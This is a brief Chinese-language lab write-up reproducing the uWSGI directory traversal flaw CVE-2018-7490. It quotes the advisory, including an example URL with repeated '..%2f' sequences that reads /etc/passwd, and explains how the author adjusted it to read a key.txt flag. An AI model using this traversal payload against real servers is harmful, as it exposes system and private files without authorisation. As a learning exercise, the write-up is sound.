uWSGI 漏洞复现（CVE-2018-7490）

先好好审题：

根目录下面有key.txt文件，我们需要想办法访问它

 

---

 

漏洞查询：https://www.anquanke.com/vul/id/1124864

漏洞细节：

 1 DETAILS
 2 -------
 3 The documentation of uWSGI states that the php-docroot option is used to jail our php environment to a project directory (http://uwsgi-docs.readthedocs.io/en/latest/PHP.html#run-php-apps-without-a-frontend-server).
 4 
 5     ; jail our php environment to project_dir
 6     php-docroot = %(project_dir)
 7 
 8 During testing it was observed that uWSGI was affected by a Directory Traversal vulnerability when executed as a standalone (without a front-end web server) along with the "php-docroot" option to enforce the DOCUMENT_ROOT of the web application.
 9 
10     uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-docroot /home/testing/webapp/
11 
12 An attacker could exploit this vulnerability by using path traversal sequences ("..%2f") to access sensitive information as demonstrated below:
13 
14     http://example.runesec.com:1337/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

 

---

 

大致意思是“..%2f”可以造成目录遍历漏洞，上面他也举例了

尝试用他的例子查看返回什么内容：

结果返回not Found

可能是..%2f（/的url编码）太多了，删除一个，发现返回内容：

那么把etc/password修改成key.txt就可以访问该目录下的key了：